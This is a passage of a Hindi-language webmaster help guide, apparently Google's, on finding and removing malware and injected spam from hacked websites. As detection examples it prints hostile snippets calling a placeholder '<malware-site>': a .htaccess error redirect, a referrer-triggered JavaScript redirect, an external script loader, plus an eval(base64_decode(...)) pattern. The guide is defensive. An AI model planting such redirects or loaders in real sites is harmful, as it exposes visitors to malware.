साइट पर मौजूद उन सभी कोड की जांच करें जो नुकसान पहुंचा सकते हैं. iframe कोड ढूंढने के लिए, "iframe" जैसे शब्दों को खोजने से मदद मिल सकती है. दूसरे मददगार कीवर्ड "script", "eval", और "unescape" हैं. जैसे, Unix पर काम करने वाले सिस्टम पर "iframe" के लिए सभी फ़ाइलें खोजने के लिए:

$grep -irn "iframe" ./ | less

2. अपनी साइट से मैलवेयर हटाएं

जब आप अपनी साइट से मैलवेयर हटाने को तैयार हो जाएं, तब आप उन फ़ाइलों को सुरक्षित बैक अप से बदल सकते हैं जिनमें समस्या है. इसके अलावा, आप हर एक पेज और उससे जुड़े स्क्रिप्टिंग फ़ंक्शन या फ़ाइलों से उन कोड को हटा सकते हैं जो मैलवेयर के रूप में डाले गए हैं. अगर आप सर्वर कॉन्फ़िगरेशन वाली फ़ाइलों में बदलाव करते हैं, तो उन बदलावों को सही तरीके से लागू करने के लिए आपको अपने वेबसर्वर को रीस्टार्ट करना पड़ सकता है.

इसके अलावा:

मैलवेयर किस तरह का है: गड़बड़ी वाला टेम्प्लेट

जानकारी

मैलवेयर से नुकसान पहुंचाने के लिए, '404 फ़ाइल नहीं मिली' जैसे गड़बड़ी के मैसेज दिखाने वाले टेम्प्लेट को कॉन्फ़िगर किया जाता है. इस तरह, हमलावर उन यूआरएल पर भी हमला कर सकते हैं जो आपकी साइट पर मौजूद भी नहीं हैं.

समस्या को ठीक करना

1. समस्या का पता लगाएं

अपनी साइट पर ऐसे पेज को खोलने का अनुरोध करें जो मौजूद नहीं है या फिर उस पेज को खोलने पर दूसरी तरह की गड़बड़ी मिलती है. खोले गए पेज की जांच करें कि क्या यह किसी दूसरी साइट का पेज है या उस पेज पर कोई मैलवेयर मौजूद है.

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

2. अपनी साइट से मैलवेयर हटाएं

अपने वेबसर्वर में लॉग इन करें और सर्वर के कॉन्फ़िगरेशन की फ़ाइलों में गड़बड़ी वाले पेजों के डायरेक्टिव को खोजें. उदाहरण के लिए, Apache वेबसर्वर के लिए गड़बड़ी वाले टेम्पलेट .htaccess वाली फ़ाइल में मौजूद हो सकते हैं. यहां एक .htaccess वाली फ़ाइल की एंट्री का उदाहरण दिया गया है जो किसी नुकसान पहुंचाने वाली साइट से 404 गड़बड़ी वाले पेजों को ऐक्सेस करती है.

ErrorDocument 404 http://<malware-site>/index.html 

जब आप अपनी साइट से मैलवेयर हटाने के लिए तैयार हो जाएं, तब आप .htaccess की फ़ाइल (फ़ाइलों) को सुरक्षित बैक अप से बदल सकते हैं. इसके अलावा, आप मौजूदा .htaccess की फ़ाइल (फ़ाइलों) से वैसे ErrorDocument के डायरेक्टिव को मिटा सकते हैं जिनकी ज़रूरत नहीं है. अगर आपकी साइट पर गड़बड़ी वाली फ़ाइलें मौजूद हैं, तो उन्हें भी हटा दें. सभी बदलावों को लागू करने के लिए आखिर में वेबसर्वर को रीस्टार्ट करना ज़रूरी है.

इसके अलावा:

मैलवेयर किस तरह का है: क्रॉस-साइट मैलवेयर

जानकारी

यह साइट एक ऐसी वेबसाइट से सामग्री लोड कर रही है जिसमें नुकसान पहुंचाने वाली सामग्री मौजूद है. मैलवेयर वाली सामग्री रखने वाली वेबसाइट के बारे में जानकारी देने के लिए, Chrome में इस ग्राफ़िक का इस्तेमाल होता है. यह ग्राफ़िक मुख्य पेज के खुलने से पहले नज़र आता है:

cross-site malware warning

समस्या को ठीक करना

  1. सुरक्षा की समस्याओं वाली रिपोर्ट में यूआरएल के नमूनों की सूची दी गई है. इनमें से कुछ यूआरएल को ब्राउज़ करके पता करें कि समस्या क्या है. अगर ये क्रॉस-साइट मैलवेयर की समस्या है, तो आपको ऊपर दिया गया ग्राफ़िक दिखाई देगा.
  2. ब्राउज़र चेतावनी की मदद से आपको आपत्तिजनक सामग्री के डोमेन के बारे में पता चल जाएगा. ब्राउज़र चेतावनी में जिस साइट को आपत्तिजनक पाया गया है उससे जुड़ी सारी सामग्री को अपनी साइट से हटा दें.
  3. अगर आपको पता चलता है कि आपकी साइट पर मौजूद कोई पेज आपत्तिजनक साइट से सामग्री ले रहा है और इस बारे में आपको पहले से कोई जानकारी नहीं थी, तो यह और भी गंभीर समस्या है. ऐसा होने पर, मुमकिन है कि आपकी साइट मैलवेयर के हमले की शिकार हो चुकी है. समस्या कोई भी हो, Google सुझाव देता है कि हैक की गई सामग्री को ठीक करने के लिए दी गई गाइड पढ़ें. इस गाइड में साइट को फिर से सुरक्षित करने के लिए बनाए गए प्रोटोकॉल शामिल हैं. इन प्रोटोकॉल से आप अपनी साइट को क्‍वारंटाइन कर सकते हैं, मैलवेयर के हमले से हुए नुकसान की समीक्षा कर सकते हैं, और साइट से मैलवेयर हटा सकते हैं.
  4. अपनी साइट से साेशल इंजीनियरिंग की सभी सामग्री हटाने के बाद, आप सुरक्षा की समस्याओं वाली रिपोर्ट में सुरक्षा की समीक्षा करने का अनुरोध कर सकते हैं. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.
  5. अगर आपने जान-बूझकर किसी ऐसी आधिकारिक साइट से सामग्री ली है जिसे आपत्तिजनक पाया गया है और आप उस साइट से मैलवेयर हटने के बाद फिर से सामग्री लेना चाहते हैं, तो आप उस साइट की स्थिति पर नज़र रख सकते हैं. आप उस साइट पर नज़र रखने के लिए, Google सुरक्षित ब्राउज़िंग के गड़बड़ी की जानकारी वाले पेज का इस्तेमाल कर सकते हैं (http://www.google.com/safebrowsing/diagnostic?site=www.example.com). आम तौर पर, आधिकारिक साइटों के मालिक अपनी साइटों से मैलवेयर हटाने में ज़्यादा देर नहीं करते हैं.
दूसरी तरह के और मैलवेयर

कई दूसरे मैलवेयर भी हैं, जो आपकी साइट को नुकसान पहुंचा सकते हैं. हैक करने के दूसरे तरीकों का पता लगाने और उन्हें ठीक करने के सुझाव पाने के लिए वेब की बुनियादी बातों की साइट देखें. अपनी साइट को ठीक करने के बाद, सुरक्षा की समीक्षा का अनुरोध ज़रूर करें.

3. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री किस तरह की है: कोड डालना

हैकर ने आपकी साइट से छेड़छाड़ की है. हैकर आपकी साइट के पेजों में नुकसान पहुंचाने वाले कोड डाल रहा है. इसके उदाहरण में नुकसान पहुंचाने वाली साइट की ओर रीडायरेक्ट करना शामिल है. इसके अलावा, पेज खुले रहने के दौरान आपके ब्राउज़र पर क्रिप्टोकरेंसी की माइनिंग करने वाला सॉफ़्टवेयर चलाना भी शामिल है.

1. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. समस्या का पता लगाएं

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

हैकर ने नुकसान पहुंचाने वाला कोड सीधे आपकी साइट के एचटीएमएल वाली फ़ाइलों में डाला होगा (उदाहरण के लिए, JavaScript से रीडायरेक्ट करने वाले कोड जोड़ना). इसके अलावा, हैकर आपकी साइट की सामग्री जनरेट करने वाली फ़ाइलों में भी यह कोड डाल सकता है (उदाहरण के लिए, पीएचपी फ़ाइलें).

सुरक्षा की समस्याओं वाली रिपोर्ट में शामिल मैलवेयर के हमले का शिकार हो चुके पेज को फ़ेच करें और मिलने वाले जवाब की जांच करें. हैकर आपकी साइट पर आने वाले उपयोगकर्ताओं को अपनी साइट पर रीडायरेक्ट करने के लिए कई तरीकों का इस्तेमाल कर सकते हैं. यहां ऐसे ही कुछ तरीके दिए गए हैं:

  • रीडायरेक्ट करना:​
    • हेडर की मदद से रीडायरेक्ट करना: हैकर आपकी साइट के सर्वर के कॉन्फ़िगरेशन वाली फ़ाइल (फ़ाइलों) को बदल कर आपकी साइट पर आने वाले उपयोगकर्ताओं को रीडायरेक्ट कर सकते हैं. आमतौर पर, सर्वर की कॉन्फ़िगरेशन वाली फ़ाइलें इस्तेमाल करके, साइट का एडमिन यह तय कर सकता है कि यूआरएल रीडायरेक्ट उपयोगकर्ता को वेबसाइट के किन खास पेजों या डायरेक्ट्री पर ले जाए. उदाहरण के लिए, Apache सर्वर पर .htaccess फ़ाइल और httpd.conf, दोनों ही सर्वर के कॉन्फ़िगरेशन वाली फ़ाइलें हैं.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • JavaScript से रीडायरेक्ट करना:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • मैलवेयर वाली ऐसी JavaScript जो किसी दूसरी साइट से लोड की गई हैं:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • शेयर की गईं ऐसी ऑब्जेक्ट फ़ाइलें जिन्हें आम तौर पर सुरक्षित माने जानी वाली स्क्रिप्ट से छेड़छाड़ करने के लिए बनाया जाता है. ये फ़ाइलें इस्तेमाल करके नुकसान पहुंचाने वाले कोड को बिना किसी तय तरीके के स्क्रिप्ट में डाला जाता है:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

अपनी साइट पर या फिर सर्वर पर कोई भी अनुरोध करने पर मिलने वाले जवाबों में संदिग्ध कोड ढूंढें. "search", "eval", "base64_decode", और "unescape" जैसे शब्दों को खोजने से मदद मिल सकती है.

3. अपनी साइट से मैलवेयर हटाएं

अपनी साइट से मैलवेयर हटाने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैक अप के तौर पर पहले सेव की गई बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं.

इसके अलावा:

4. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री किस तरह की है: सामग्री डालना

हैकर आपकी साइट के पेजों में स्पैम वाले लिंक या टेक्स्ट डाल सकते हैं. हैक करने के लिए इस्तेमाल की जाने वाली सामग्री में दवाओं के नाम या स्पैम वाली दूसरी ऐसी सामग्रियां शामिल हो सकती हैं जो साइट की सामग्री से अलग हों.

आम तौर पर, हैकर इनमें से किसी एक तरीके से आपकी साइट में बदलाव करते हैं:

  • आपके सर्वर पर किसी असुरक्षित डायरेक्ट्री का एक्सेस पाकर. उदाहरण के लिए, हो सकता है कि आपने अनजाने में किसी डायरेक्ट्री की सेटिंग इस तरह कर दी हों कि उसे कोई भी व्यक्ति देख सकता है.
  • आपकी साइट पर चल रहे सामग्री प्रबंधन सिस्टम जैसे सॉफ़्टवेयर की कमियों का फ़ायदा उठाकर. उदाहरण के लिए, हो सकता है कि आप Drupal, Joomla या WordPress के किसी पुराने और असुरक्षित वर्शन का इस्तेमाल कर रहे हों.
  • विज़िटर काउंटर जैसे तीसरे पक्ष के किसी ऐसे प्लग इन को हैक करके जिसे आप अपनी साइट पर इस्तेमाल करते हैं.

1. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. समस्या का पता लगाएं

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

अपनी साइट के कुछ पेज फ़ेच करें और ऐसी संदिग्ध सामग्री या लिंक की जांच करें जिन्हें आपने नहीं जोड़ा है. उदाहरण के लिए, दवाओं के नाम या स्पैम वाले शब्द जैसे कि "viagra" या "earn money" खोजें.

3. अपनी साइट से मैलवेयर हटाएं

अपनी साइट से मैलवेयर हटाने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैक अप के तौर पर पहले सेव की गई बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या हर पेज से स्पैम वाली सामग्री और लिंक हटा सकते हैं. अच्छी तरह जांच लें कि सुरक्षा की समस्याओं वाली रिपोर्ट में दिए गए हैकिंग के सभी उदाहरणों को ठीक कर लिया गया हो. इसके अलावा, आप Google पर “site:” खोज सुविधा का इस्तेमाल करके और अपनी वेबसाइट पर सोर्स फ़ाइल खोजकर, यह पता लगा सकते हैं कि आपकी साइट के किन पेजों को हैक किया गया है.

इसके अलावा:

4. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

हैक की गई सामग्री किस तरह की है: यूआरएल डालना

हैकर अक्सर आपकी साइट पर ऐसे नए पेज जोड़ता है जिनमें स्पैम वाले शब्द या लिंक होते हैं. कभी-कभी इन नए पेजों में ऐसा कोड होता है जिससे आपकी साइट पर गलत असर पड़ता है, जैसे कि आपके उपयोगकर्ताओं को दूसरी साइटों पर ले जाना या दूसरी साइटों के ख़िलाफ़ सेवा में रुकावट के हमले में आपके वेबसर्वर को शामिल करना.

1. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

2. समस्या का पता लगाएं

अपनी साइट के उन पेजों को ब्राउज़र से सीधे न देखें, जिन पर मैलवेयर का असर हुआ है.

मैलवेयर अक्सर ब्राउज़र की कमियों की वजह से फैलते हैं. इसलिए, आपका कंप्यूटर ऐसे पेजों को ब्राउज़र पर खोलने से खराब हो सकता है, जिन पर मैलवेयर का असर हुआ हो. इसके अलावा, हैकर क्लोकिंग तकनीक का इस्तेमाल करके स्पैम वाली सामग्री को छिपा सकते हैं, ताकि साइट के मालिक उसे देख न पाएं.

अपने कंप्यूटर पर सामग्री को ज़्यादा सुरक्षित रूप से देखने के लिए, यहां दो वैकल्पिक तरीके बताए गए हैं:

  • Google को आपका पेज जैसा दिखाई देता है, उसे वैसा ही देखने के लिए, यूआरएल की जाँच करने वाला टूल इस्तेमाल करें. यह इसलिए कारगर है क्योंकि कई हैकर पेज में जिस तरह के बदलाव करते हैं, वे सिर्फ़ Google की मशीनों को दिखाई देते हैं. उदाहरण के लिए, वे आपकी साइट के पेजों पर उनकी साइट तक ले जाने वाला लिंक डाल सकते हैं. ये लिंक सिर्फ़ तब दिखाई देंगे, जब पेज को Google के तौर पर देखा जाएगा.
  • एचटीटीपी अनुरोध (जैसे पेज को फ़ेच करना) करने के लिए कमांड लाइन से cURL या Wget का इस्तेमाल करें. ये टूल मुफ़्त में इस्तेमाल किए जा सकते हैं. इनसे दूसरे वेबपेज पर भेजने वाले लिंक आसानी से पहचाने जा सकते हैं. इन टूल की मदद से ब्राउज़र या रेफ़रल देने वाले के बारे में जानकारी भी ली जा सकती है. आम तौर पर हैकर सिर्फ़ खास ब्राउज़र और रेफ़रर के साथ ही छेड़छाड़ करते हैं. इससे उनका पता नहीं चल पाता और वे ऐसे उपयोगकर्ताओं को चुन पाते हैं, जो धोखे से उनकी साइट पर आ जाएं. इन टूल का इस्तेमाल करके आप अपनी साइट को उपयोगकर्ताओं की तरह देख सकते हैं. अगर आपका अनुरोध स्पैम वाला नहीं है, तो ऐसी दूसरी वेबसाइट (बड़ी वेबसाइट या दूसरे सर्च इंजन के लिंक) देने की कोशिश करें, जिन पर आपकी साइट का लिंक हो. उदाहरण के लिए, किसी Windows मशीन पर www.example.com/page.html को 'Google सर्च' नतीजों से इस पर आए उपयोगकर्ता की तरह देखने के लिए, इस तरह के यूआरएल का इस्तेमाल करें:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

यह देखने के लिए कि आपका बनाया गया कोई पेज Google पर मौजूद है या नहीं, रिपोर्ट में उदाहरण के तौर पर दिए गए यूआरएल को खोजकर देखें. अगर आपने ये पेज नहीं बनाए हैं, तो आपको अपनी साइट से इन पेजों को हटाना होगा या फिर अपने-आप पेज जनरेट करने वाले कोड को हटाना होगा. अपनी साइट पर इन पेजों को ढूंढने और हटाने का तरीका जानने के लिए यह पढ़ें.

आप “site:” खोज सुविधा का इस्तेमाल करके भी ऐसे पेज खोज सकते हैं जिन्हें आपने नहीं बनाया है.

  • किसी छोटी साइट पर, आप 'Google सर्च' में [site:example.com] खोजकर ऐसे पेजों की सूची देख सकते हैं जिन्हें हमने इंडेक्स किया है. ध्यान दें कि उसमें कोई ऐसा पेज मौजूद न हो जो आपने नहीं बनाया है.
  • बड़ी साइटों के लिए, आप ज़्यादा खास तरह की क्वेरी इस्तेमाल कर सकते हैं. उदाहरण के लिए, यहां देखें:
    • [site:example.com pharmacy] - example.com पर "pharmacy" शब्द वाले सभी पेजों की सूची बनाएं. इसकी जगह दूसरे सामान्य स्पैम वाले शब्दों को खोजकर देखें.
    • [site:example.com/wp-admin/] - अपनी WordPress साइट के साइट व्यवस्थापक सेक्शन में सभी पेजों की सूची बनाएं.

3. अपनी साइट से मैलवेयर हटाएं

अपनी साइट से मैलवेयर हटाने के लिए, आप मैलवेयर वाली डायरेक्ट्री को हटा सकते हैं. साथ ही, आप उसकी जगह बैक अप के तौर पर पहले सेव की गई बिना मैलवेयर वाली डायरेक्ट्री इस्तेमाल कर सकते हैं या फिर आप ऐसे अनचाहे पेजों, फ़ाइलों या फ़ंक्शन को हटा सकते हैं जिनका इस्तेमाल करके हैकर ने डायरेक्ट्री बनाई हो.

इसके अलावा:

4. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद, सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

नुकसान पहुंचाने वाली फ़ाइलें

आपकी साइट पर ऐसी फ़ाइलें मिल सकती हैं जिनकी Google सुरक्षित ब्राउज़िंग से मैलवेयर या अनचाहे सॉफ़्टवेयर के तौर पर पहचान होती है. उपयोगकर्ता के आपकी साइट पर आने पर, Chrome ब्राउज़र चेतावनी दिखा सकता है. आपको चेतावनी हटाने के लिए अपनी साइट से ये डाउनलोड हटाने होंगे.

1. समस्या का आकलन करना

अगर ये फ़ाइलें जानबूझकर डाउनलोड की गई हैं, तो इन्हें अपनी साइट से हटा दें और सीधे समीक्षा के लिए अनुरोध करें पर जाएं.

अगर आपको साइट पर मौजूद इन फ़ाइलों के बारे में जानकारी नहीं है, तो हो सकता है कि आपकी साइट हैक कर ली गई हो. अपनी हैक की गई साइट की समस्या हल करने के लिए, इन फ़ाइलों को ढूंढें और अपनी साइट से हटा दें.

2. देखें कि क्या आप इस समस्या को ठीक कर सकते हैं

स्पैम की समस्या को खुद ठीक करने या इसके लिए मदद पाने का तरीका जानने के लिए, 'सहायता टीम बनाएं' लेख पढ़ें.

3. समस्या का पता लगाएं

असामान्य रूप से डाउनलोड होने वाली फ़ाइलों की पुष्टि करने के लिए, अपनी साइट के कुछ पेजों की अच्छी तरह जांच कर लें.

4. अपनी साइट से मैलवेयर हटाएं

अपनी साइट को पूरी तरह से सुरक्षित बनाने के लिए, हैक की गई सामग्री को ठीक करने के लिए बनाई गई गाइड पढ़ें. इसमें आपकी साइट से मैलवेयर हटाने के तरीके और उसे सुरक्षित रखने के सुझाव बताए गए हैं. अपनी साइट से मैलवेयर हटाने के लिए, आप मैलवेयर वाली फ़ाइलों को हटा सकते हैं. साथ ही, आप उनकी जगह बैक अप के तौर पर पहले सेव की गई बिना मैलवेयर वाली फ़ाइलें इस्तेमाल कर सकते हैं या फिर मौजूदा फ़ाइलों से स्पैम वाली सामग्री हटा सकते हैं. अपनी साइट पर होस्ट की जा रही बाइनरी फ़ाइल और दूसरी सामग्री को स्कैन करने के लिए एंटीवायरस सॉफ़्टवेयर इस्तेमाल करें. एंटीवायरस सॉफ़्टवेयर कई तरह के मैलवेयर और अनचाहे सॉफ़्टवेयर का पता लगा सकता है. हालांकि, इससे हर तरह के मैलवेयर का पता नहीं लगाया जा सकता. किसी एंटीवायरस प्रोग्राम (या सभी तरह के वायरस की जानकारी इकट्ठा करने वाली सेवा, जैसे VirusTotal) से अपने सॉफ़्टवेयर की जांच करें. इस प्रोग्राम या सेवा से आपको पता चलेगा कि आपके सॉफ़्टवेयर में क्या समस्याएं हो सकती हैं. Google सुरक्षित ब्राउज़िंग की सुविधा में तय की गई शर्तों के मुताबिक यह जांच की जाती है कि कोई प्रोग्राम या बाइनरी फ़ाइल अनचाहा सॉफ़्टवेयर या मैलवेयर है या नहीं.

5. समस्याओं को ठीक करने के बाद उनकी पुष्टि करें

ध्यान रखें कि आपकी साइट अनचाहे सॉफ़्टवेयर की नीति के मुताबिक सही हो.

6. समीक्षा का अनुरोध करें

पहले यह पुष्टि कर लें कि आपकी साइट में सुरक्षा की समस्या को ठीक कर लिया गया है. इसके बाद सुरक्षा की समस्याओं वाली रिपोर्ट में, सुरक्षा की समीक्षा के लिए अनुरोध करें. साइट की समीक्षा करने में कुछ दिनों से लेकर कुछ हफ़्ते लग सकते हैं.

नुकसान पहुंचाने वाली साइटों के लिंक

आपकी साइट पर ऐसी साइटों के लिंक मौजूद हो सकते हैं जिनमें Google सुरक्षित ब्राउज़िंग के मुताबिक मैलवेयर या अनचाहे सॉफ़्टवेयर हों. उपयोगकर्ता के आपकी साइट पर आने पर, Chrome ब्राउज़र चेतावनी दिखा सकता है. आपको चेतावनी हटाने के लिए, अपनी साइट से ऐसी साइटों के लिंक हटाने होंगे.

1. समस्या का आकलन करना

